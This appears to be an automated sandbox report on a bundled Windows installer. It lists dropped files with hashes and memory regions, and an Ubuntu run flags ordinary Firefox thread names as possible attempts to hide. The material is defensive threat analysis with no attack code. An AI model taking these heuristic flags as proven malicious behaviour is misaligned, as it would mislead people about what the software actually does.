| SHA512 | 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 53ea46dbd6b60a6cfdea0c350924dfb3 |
| SHA1 | 186b9d2f48dea6b279e24b7c5eb21453b63a61de |
| SHA256 | e7b2a685cb7d9d25bc92ccd5ae33f9664c0c951ca7e8afbeab103188e6f9738c |
| SHA512 | 99768cd1edc0564849961f0993904822f1f27b6c9b1001352925458e77506ec413149e5afa5c163795179c15ebb85db25cf19ee758722726138a0bc56ffdc521 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 4ea7fb0ffedbbbe097b34a1734771b27 |
| SHA1 | b5d55e909d348169162b76a45dd67ef2770cb84f |
| SHA256 | 6365f56d0b9fbfbf0fe758684b0d98e4aa2e93056efb268413bcb56fd87a8eb0 |
| SHA512 | 2ec87c7c8f19a2789b0c8c100086b01588150a88ab9a0b6b7c5759ab90b095dfd52205a5ec8103a68a8e3759dce2fb322e32c4cba67baa55580944803b0ee188 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009
| MD5 | c594a826934b9505d591d0f7a7df80b7 |
| SHA1 | c04b8637e686f71f3fc46a29a86346ba9b04ae18 |
| SHA256 | e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610 |
| SHA512 | 04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961 |
C:\Users\Admin\Downloads\setup_NUyyEY7ilu.zip
| MD5 | cac64ed2e120b9ef349315f044ea2cec |
| SHA1 | 47a5d926660edb2495652e039354dd9453fb30e9 |
| SHA256 | 817b4d31af33dce7a8cca205dd6a2db4feb2cf1a9489ded2452482bef066e9d7 |
| SHA512 | 41549098efa4a9cd5d2f20e2f0359dcad6ab63a4328872f9d5172d05295ba4388a3fbe6036b391bea14391d1352f6440a84f0f5f28087d6df885f3e156006fda |
C:\Users\Admin\Downloads\setup_NUyyEY7ilu.zip:Zone.Identifier
| MD5 | be20faea74c1214ba8bd33286b96a83d |
| SHA1 | e3f4ac85b5e95ebd3dcaa7d04db8481205ebbada |
| SHA256 | ea649aeba3cf20a68c1370b962455d62978a1c3e652a7c66b042bc3db7f89b56 |
| SHA512 | e9adc1902d83c613ccdebedcc61de0f013ead73134974fbff3f9cfa10b26f4abd08a4d9fc8a5fcc7c3426263314f1edeeda5c81c20cd6f4b84a196778426d118 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ea8bbcd1e030deb2b30de131421959a4 |
| SHA1 | 02b15f7b3987d0a2bda6f938ad468635b660985e |
| SHA256 | afb1970310770ab4850e77fc7f18257c3dcee62d26426632e2120f80978f8ba7 |
| SHA512 | 0ea2a2809672e1dee98f732b6b3c03b6ee0b86bbc580e101508179f531665c8edd087bc9eccea8f502ecd2198cfbce692718c47c3b7432a4eb933d81c407e3a8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 2096dc2f9304c28cb88a5a60e6f26655 |
| SHA1 | 4d29bb5573b2baa4c5aeb7951819aadd06107eb0 |
| SHA256 | d5830b36f451a8288c16ad459c685283e272a83e6c3ae1f1a05f51021bfb1e19 |
| SHA512 | 68a9d3021a21f3ea2e336ffecf665d58f1a46345164c1de46901500327b471c34cc33f784dea36946e4f6380a3ea1a296dff9ca63648093389f1596d398f3b80 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6d7a81b882cfeb4ef5dfefd4f270c037 |
| SHA1 | 0eee2cc765116a5acd4a99d950325f9dd1678f01 |
| SHA256 | aa13ce2440b6dc974946019fc43a0365087b8cc5d04398682b37ac83e8d59c03 |
| SHA512 | 0c2d4e5ccf03c423600fe28183d1774e51bf13ad54c0f36444e674055d05b35799dcf31d3313b36c2d0b67160359ab19cddb5a18a8d01f0f8cde75aa15357ab5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9446eb5d861529ca55df862f178c4783 |
| SHA1 | 1642458d1abea967484217a41590d833501f24b3 |
| SHA256 | 829e2c88fb37b81088467eb46b7a588368ac48e7e8607f2fef0160b469c8c341 |
| SHA512 | 2c0fbefbf4403fc0b8dd8b6962d1d3529d5af7897be12695b1f5b2b4728b69f1d5f077f6e504f1e4d797a69fe25c82b6afed99acf59a65d6247028f03ca353e2 |
memory/1056-319-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-3ME7O.tmp\setup_NUyyEY7ilu.tmp
| MD5 | 4b0524fa48ddc6b8d8191ef7a213b2e6 |
| SHA1 | d05ecb09aadbde153ad37c67db8b0206efa1fd37 |
| SHA256 | 43af110947449a12b150169d107ff3d7cd103801e5dadf6485cdc719e185bde6 |
| SHA512 | 4d29764c488281586dbcdb5eeb10a8924ab689ddc839b08b779c98e26eec8460aac531b156eafb937192bce486bee89bc117e47aa1ae4d7045ff72ff813d78bf |
C:\Users\Admin\AppData\Local\Temp\is-172F4.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
| MD5 | 7f2c34b6c0c8680f35a234077c40ee51 |
| SHA1 | e83cd07646f25afccda2ff63f7035d147268b264 |
| SHA256 | a8d33c8ae6df133bebbaebc079225aa6662cad3413a36feefe29c1ac6e3ce474 |
| SHA512 | 8633680cd10b6ba33831c3962dceecef234b16b328c6f32dd1146a89b42738bdb02e91c1ebe2799e1a4f578050ee1d32b36cbcc92c0b26f0a28d59613a60014f |
memory/4396-388-0x0000000000400000-0x0000000000D15000-memory.dmp
memory/4396-389-0x0000000000400000-0x0000000000D15000-memory.dmp
memory/3800-395-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1056-394-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4396-396-0x0000000000400000-0x0000000000D15000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 75cab84940483a5af10229ddeeb37de5 |
| SHA1 | 48e58f7cf100eebbebabba3f687e51662c5b0531 |
| SHA256 | cb6d9220526f73f9333f1cf4db44b9f37231721d0a37ab36a2d08537f63e3dd5 |
| SHA512 | 2a30b850109ae5384e8c9fdd74f07f1dfd064bfe0dbdf1e315b6ad32563e1a05b7a4bcda912e61d81d4e313ca2038f0a9c592a321282bc10925f3dc98ae9bde6 |
memory/4616-441-0x0000000002290000-0x00000000022C6000-memory.dmp
memory/4616-442-0x0000000004D30000-0x000000000535A000-memory.dmp
memory/4616-443-0x0000000004CF0000-0x0000000004D12000-memory.dmp
memory/4616-444-0x00000000054D0000-0x0000000005536000-memory.dmp
memory/4616-445-0x00000000055B0000-0x0000000005616000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_15wyulhd.r1n.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4616-454-0x0000000005620000-0x0000000005977000-memory.dmp
memory/4616-455-0x0000000005A90000-0x0000000005AAE000-memory.dmp
memory/4616-456-0x0000000005AD0000-0x0000000005B1C000-memory.dmp
memory/4616-457-0x00000000072D0000-0x000000000794A000-memory.dmp
memory/4616-458-0x0000000005FA0000-0x0000000005FBA000-memory.dmp
memory/4396-459-0x0000000000400000-0x0000000000D15000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\nKCK4ZJZ894JRgKi.exe
| MD5 | 0818da4635ebc7617bb20959ec058d27 |
| SHA1 | 90a6e7822249c16e2b77afb164908b240b48ae4a |
| SHA256 | 082c308c0615523c0b5e9ed754cd5e6d84542c5de10be45325e6f9459026163f |
| SHA512 | 0855e2e306106c63d26028d467ee95625322fb3a58fbd6d6cf3257aa6f8e0c98f05b7dc861f130ffd5a2dc96019ab4e98a975a7c7bff3b148b538efc5a067d1b |
C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe
| MD5 | 9f1b088ecc5e2f36939797060e8f5956 |
| SHA1 | 78adf95b81e539d1450c61a8d135f5f836bcd4a9 |
| SHA256 | 1caa0f7f2913218f5bcd069a52aad482396914780d89f77c6610b70b36dc1e13 |
| SHA512 | 6bd73db75e7c7493ac6e03e745385641c4eccaeb1d8e96a2b157e1d4043d42990a05edd6702f28e25d4a25d4e39295739f1a6a6ccf89e629f6010ee8ebd66212 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2407141758214892984.dll
| MD5 | 82234053e684a16ea0b40a7f208f3233 |
| SHA1 | 00381b28887a12f9ef8ee51cdbcc4320679ae88b |
| SHA256 | 23bda6025409f7e0a044b10644f4bace9772426312a969552931291306917c23 |
| SHA512 | be3235cc7d6ed941ced36cdc43a87ffae3b5163cacc12c2cbe6f320b6469d1c16d0bf2e42558df504d2c1a12d0234cfd187438830a59554696864a234de5f357 |
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | e237b96e4993cc7ca518e76d0d643f69 |
| SHA1 | 7c87fdf56cd22e809387175766ceff64f492c1ee |
| SHA256 | 4d0f6603ca7c718678d72d239f9489734b6d31bde233e3f401b2e35173f0f5c9 |
| SHA512 | 2f007a820e994548f269c49879806d216e8b4b4c59513686217fded3f6332859c0a9240cb08efb3a01f55e901c53546ea26b4d51f685d0fffd7ec0cfcd69f8ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 7eca2f8c66da277f6145e317e5268d79 |
| SHA1 | cbd5e403a3dae1ac2d3c601faab78ddfd55b0aad |
| SHA256 | a66ca76bd55f7976f8f5ebca169e06ea88ef89d736a90277710a9fd62e95c07b |
| SHA512 | dc5e7e81729d984e94fe113de27e75742d85bb97d855fdda2a82e704d022f6f8d889432be3a301392d1e27e26c4a541bffded9c5cc4117d541ca71b89cbcacef |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | c0636f2d138baca01dbb2eedb99bf3d5 |
| SHA1 | 3b927899db0f3e2cb510782592887dc02fc3e400 |
| SHA256 | 10973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a |
| SHA512 | 0187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d |
memory/3988-546-0x0000000005590000-0x00000000058E7000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 877f5713ecf3e796d6f25b83edefa8e8 |
| SHA1 | 1c7bbcb5d1d17bd1626ec5fbf4b1e55a4f588fb7 |
| SHA256 | 0705accf76b8226aca95a7684f264c675a2f2ab9d545c7b0c21e853dc441056e |
| SHA512 | 6f0e39ee16dfc31dce679293897b30426d0bf584040df449276db765bc031bdb00df51b428d9907f29c01eabc330f2f3bd15e246219ef740371cacba2127f5a2 |
memory/3988-548-0x0000000005F80000-0x0000000005FCC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe
| MD5 | b22ba99456c105c277eb9056ca3f3485 |
| SHA1 | 0db7280440aca3555f22a6ce8e6c4a7a0e38f142 |
| SHA256 | f86514113851b00bde75908f84847837191cf3de0548b2f478601707600f5000 |
| SHA512 | 0a41feefb24c7bef8b04803eff1fedfb7a9775e63c6f5080c624eaec46e48dd8340b33df5c15a17245a6627f74994b2c22aa4a9eaf0f6b029d4891e66792b965 |
memory/4396-567-0x0000000000400000-0x0000000000D15000-memory.dmp
memory/4396-568-0x0000000000400000-0x0000000000D15000-memory.dmp
memory/1588-575-0x0000000010000000-0x00000000105E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\additional_file0.tmp
| MD5 | dfe86cd1ab9fe5055dba3ead830574f6 |
| SHA1 | 800ba6757bf301a918a800ce15a3853e3941e019 |
| SHA256 | f9cdff6fea65207cde93c637cca4b92939359ede3ac7337c2048e076085e7e5f |
| SHA512 | d3d363a221a3fa7a010194965cb8cc7210aa17d81be094a3e8ee89bb2de684c3b874ce1c6c55e8109091a849874d05c1bae132d450dabe2597167782d0063570 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\assistant_installer.exe
| MD5 | a8c564c798ae8160230297d361952dd6 |
| SHA1 | 34a45ee9eb7733ae9afbebb9f2951288a27f9df5 |
| SHA256 | 3f48e5331890159921f7b65103c4b06bbf08552065718313761647d1648f8a64 |
| SHA512 | 141ac3356a2fee32121231308cdd8afa5f76695185d66bba9fa977b66e5c6bad8bd4ea4656acdc743cd6b6f85c28a16626ab07f8b2c72652de82b4fb21c0bb54 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\dbghelp.dll
| MD5 | eeb07dc97790e8b075d6938759fe6ee1 |
| SHA1 | afb099be8ee28fef6488b5d253ba910b081a3b1b |
| SHA256 | 2808772ce1653cdf659f4781c718a9dd6f3ac547d52a1080462487baccaeaf78 |
| SHA512 | e541d839562c5045b5af0cc7ad2129393383df3fc528193cdef1a31ded4e894ffb8a02d34a009b3d6543d4987616534caaefa130a2b55ea73baf37ee0a294980 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\dbgcore.dll
| MD5 | ff0364394f7bc74d0c68040a5fbcda6f |
| SHA1 | d19ce25e7d0e3043c377c5770b0f20cb42bd0295 |
| SHA256 | 3bd944ca30b77f9ce8a1f503a7ee0dbcb77b92ae9fcd68907abe0ef2e9275053 |
| SHA512 | 0676de1a65cc9c209f544e921f45c5eb8c5d42fb391ae1f370b0a2bedd26740f75f32ea5f17497d86e03edd6cf281ca51a7a54380a82de152d0e25a28297ccfd |
memory/3804-626-0x00000000057F0000-0x0000000005B47000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6dba3e67b051902745d4b2da2b8be5b9 |
| SHA1 | 40f4d9f3de864c08ded81d27c552920c6a20b6f9 |
| SHA256 | a07f8d9d81e550774a222c1e98ff4f1a75e865374e1fcd5358eba75bbc1068e3 |
| SHA512 | a2d90987b62d15b0a8d0638bc96e49d607112f2e99460db3426086e1de06f5341c09a6b3b9418ea094e62b59541cb420b98b3136d3351354b382dd251212df90 |
memory/3804-628-0x0000000006280000-0x00000000062CC000-memory.dmp
memory/4396-642-0x0000000000400000-0x0000000000D15000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 812bb17e95be04edcde45e5f025cdce3 |
| SHA1 | 54e42ace715ce9be05b7082c7c881fb0fb727a7e |
| SHA256 | b5befd47f969de593323d458b17307e6be585bbf7a67bfa6cc24277980a57d31 |
| SHA512 | a83f3d1fb60eaa188141b289ea4a3b284431a4f0c5d04aee3f7b3e43182d217da671fe7ea6b3d038182036759dab91cd7731c9d2758e40d944788d7911f6d7f8 |
memory/4396-663-0x0000000000400000-0x0000000000D15000-memory.dmp
memory/4396-668-0x0000000000400000-0x0000000000D15000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d8912901b4e9ec789b636fb92fea3bb1 |
| SHA1 | ad9f58edcf25235520208e6a102724241c374d77 |
| SHA256 | 897f91fb69b4c55d7fb435b1745f102513b0bd3ce0e85b208e84ff0daff6b9a8 |
| SHA512 | 499d7227f8e615630c1fdd2250976fbba7cab30221e2d9170b3c8642200729a510643451ded6798f004da9e18dfeb901e51c636360ab889134bdeb566aea9295 |
memory/2800-679-0x0000000010000000-0x00000000105E5000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 5b74da6778ccaa0e1ca4ae7484775943 |
| SHA1 | 0a2f6f315a0ca1a0366b509aec7b13c606645654 |
| SHA256 | 172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78 |
| SHA512 | 20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a0bb6c6a8ba2ad5eaefe286840c54689 |
| SHA1 | 84c98956a3fc10c31d69aaa732beb6e86715d781 |
| SHA256 | a61a13878c331bde4a5674366a87db1f4df54f539f19cb30818207f5960331b6 |
| SHA512 | 9996040b7af3ca4c631dda2af37a33a379722b48be2bbe7d8d9bbcc9aa7998b1fda25fc8345c71fc50e727423260ffa90ba30cdaf5e33b2873e4ba5eb23ef1b2 |
memory/1540-703-0x0000000004B70000-0x0000000004BBC000-memory.dmp
memory/2516-707-0x000001121BB20000-0x000001121BB42000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b25d4b4cdb5fb97d2cc0a7ee71e6d1e5 |
| SHA1 | 7465eafe8958877b66396d55e457dda836ba029f |
| SHA256 | f6e5421810ec512ec93de5cd6519e4a0bcfbe0a777c2c33ecd80bb62ae86489c |
| SHA512 | d2dd122262039069b701ccfb30ce29ef5374eabed838c404ab89a6c2a5e6fe54ad144b6853753bc1478c97ddbb68e7e92cd5ce6619fec020bf7aa3994c6ea715 |
memory/3800-720-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/4396-721-0x0000000000400000-0x0000000000D15000-memory.dmp
memory/4396-733-0x0000000000400000-0x0000000000D15000-memory.dmp
memory/1104-738-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/1916-751-0x00000000055A0000-0x00000000055EC000-memory.dmp
memory/1104-760-0x0000000002390000-0x0000000002415000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi
| MD5 | 9b792a87a71a049a3058c266e3b3a873 |
| SHA1 | 3d46bd9999f9301c6b3f1563837b6134e53d656e |
| SHA256 | 11484ff09b61180c7451c89d6832715bc91635271befdc77efefb6b9db2db629 |
| SHA512 | 3df989850ce080edaff1d7fd243574667baa474cc5e898721d1891b93d5e12c5b3d635734bd9720661a66a39a26c594b2a43d5a4f400dc8acd561e9631cb80fb |
memory/4396-797-0x0000000000400000-0x0000000000D15000-memory.dmp
memory/1104-805-0x0000000003630000-0x00000000036A8000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json
| MD5 | 33292c7c04ba45e9630bb3d6c5cabf74 |
| SHA1 | 3482eb8038f429ad76340d3b0d6eea6db74e31bd |
| SHA256 | 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249 |
| SHA512 | 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json
| MD5 | 5c5a1426ff0c1128c1c6b8bc20ca29ac |
| SHA1 | 0e3540b647b488225c9967ff97afc66319102ccd |
| SHA256 | 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839 |
| SHA512 | 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bnaebcjlolajbgllgjlmlfobobdemmki\3.8.26_0\_locales\es\messages.json
| MD5 | a14d4b287e82b0c724252d7060b6d9e9 |
| SHA1 | da9d3da2df385d48f607445803f5817f635cc52d |
| SHA256 | 1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152 |
| SHA512 | 1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | dd9217e59e20f0d91fb59a7161062e3d |
| SHA1 | 10382b2aee3b174d1887749834fc66b12d4f0a59 |
| SHA256 | e27d7ed5095b28e6db13ea06824800d3ec70c14c012eac0c8584ae3624412882 |
| SHA512 | 8227e0563375a8ffd268c676ee159260bb8ce39634e71ca183d83843f17695ef9045d3b0f8bb1aeb97b791ed3507656585ad90a0ba44b389a7bf071437b88b67 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4i9bphnb.default-release\prefs.js
| MD5 | 72edba5d49977cd53f6a06de569149a1 |
| SHA1 | e70cfc7dff917c908b16763fa0cb551327546e66 |
| SHA256 | 3191c3b27b62637f70dd9cfb56cbbf5aec6981240ad9f9655c8f48e7a563c625 |
| SHA512 | 93baac514a77c8729c6cb0869feb4866409e6820678567fb451a8fbdcd14eaffd692bab6dc03ad02b5fa156ee201d797631916133bdf220f0eb73d15672f4b2d |
memory/1104-1128-0x0000000004150000-0x00000000041DA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ef2e2a599a09d89ee7f00ca86788c1df |
| SHA1 | 006c3dfe1d595751a16628ecb8e64b9e3e98a108 |
| SHA256 | c20b24ae32dfebd27d3fac4e256cb876dca426ee347aba625604ff4bf50c1910 |
| SHA512 | 7144ec406f05bb05eaf76c3de74c253051f3c2f0c9ae38898d491cda2ff080a108c6408bea731d92a6884e4d047d480d11c1f341ed5c46d7da8675a7a1c5a8f4 |
memory/1104-1142-0x00000000041E0000-0x00000000042AC000-memory.dmp
memory/3052-1203-0x0000000001A60000-0x0000000002045000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c60958256e75927af97a40a59bb2ece0 |
| SHA1 | e54c461abfffcf12224190706c01981d2781ace1 |
| SHA256 | 6676950c91d7b9dfbc50238943d8d17ce4551c48a8bebcca7c88e86630460ee2 |
| SHA512 | c84476ff75aaaa3751fde3e6e716bd77f8d0c2ccaac4cc02f41f5ade2162e5ccdea2844ced2c9548a6ae3741b47016cbc38e2d0147c7a706a1ee4f1d2bbcbaea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 51c55e896682b300f20ba9fbe083d30f |
| SHA1 | c9c0028b9a7d2834f2f1a612a62301b90dcad685 |
| SHA256 | d4a56657f5ede19dd8662d59e4700977d21014e795b54623a9d9fecabbe924c3 |
| SHA512 | 673c4b5d0e37084c75a5405af13d40accf2b0979262a7d6d677f46316661953c857e16a8a070092ba2e96c03131747cac9ec51a262339f762e30a5e75e8296ca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 5c5775d1e60d149314c0de09e7f14f75 |
| SHA1 | 6a24b491bb5f51b9288b9b93800a567c3a41b6ce |
| SHA256 | fa41f1c273adb7d03ce4dee901b291e69f2cfa3c702e5f1a7d56e6be465155ac |
| SHA512 | 99f5ceaeedd4f1dc53ee57e121a512eb11403c001a1d6eac03356de5abfc8b15381020094525aebd6cb4105ff8cda9c76d8fb47836b156009ba0aeb22c816c38 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
memory/4396-1262-0x0000000000400000-0x0000000000D15000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 86cbe5c8a0661982f700e6d5b8c1e595 |
| SHA1 | 4faffa542cf290945c548b072f91e037e8e5bbac |
| SHA256 | a66071f9f1fb52f22021acadb6cd581bb0e8e9f40fed2f5634a5e911ad195d44 |
| SHA512 | 6ead42a33077f9e9cc9309e7967fc48d2cd222166722280271dd6387de1fc0d24bdd381421992772f909391c170369739ab10970916a0d21f45966b0a5ee38c1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 41231794b8ad870b099938bbeb3eecab |
| SHA1 | ea80af27ca707ee734fbe4089f0b34b4928e09ca |
| SHA256 | 5953859b632aefe63969b837a64bd8b24c997a83f8580de5393e39192e274302 |
| SHA512 | f4f91ec12a361aef8b4a310ea0c5927f3bdcb6aaf282e5446baa6fa44f711d46659c12b7676499b4b8091e86f878e01b2bd81e04fa21bea8a587e3a2c7f10cb4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 64b530c8a6e474469185be55d298b021 |
| SHA1 | c18f2ec3815e802a184b3e7c9173d28cc8028ba8 |
| SHA256 | 458869554101ac038204a420879591aa3688a9f8c1540d924b8351b70fd072de |
| SHA512 | cf80ecef1748d3b4dcdebc32682854ec9f4dd6efde86bd1189a6f07b8fc9baeb907df4f75fe3bc59695410dd02685a91de6adf15b072bd0e9a7d58b82d8dae34 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8393e53999978710d7bc480dddf3f436 |
| SHA1 | 3f53e1c912a84755d9754bdede59ab48aa1b9891 |
| SHA256 | 40a0be8b7501a45cc9688f4b9d13237637f2b69b5b2ea74728a58508d08dcc15 |
| SHA512 | a1b79e0bbd8c396d213e6cb8eaff0fd883448853803e0be12661e74060de153a434623c75b20e58f4a2d9697c05063a8fc0c94f577e35322d396879405bd75f2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 58c61189c21d947b4096d326e34c246b |
| SHA1 | 1662478989bf05c5552500ea127213152a084125 |
| SHA256 | 0ce21a79f691c1e33fb51415741906c08aa15a546d6ca1eefbf37cb90204ef67 |
| SHA512 | c4284a0457236bd3d4721fa4d99c2ef91941da78fb69993a2f236352603ba3b2fc650fb14dfb4fd22a248bacbe678455d3a0076eac2d1ccf279b33d1e0a9f1b8 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-14 17:56
Reported
2024-07-14 18:01
Platform
ubuntu2004-amd64-20240508-en
Max time kernel
299s
Max time network
220s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | gmain | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | gdbus | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | glean.dispatche | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC I/O Parent | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC I/O Parent | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC I/O Parent | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | HTML5 Parser | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | HTML5 Parser | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Backgro~Pool #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Backgro~Pool #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPDL Background | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPDL Background | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Socket Thread | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Socket Thread | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Netlink Monitor | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Netlink Monitor | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Timer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Timer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | pool-firefox | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | pool-firefox | N/A | N/A |
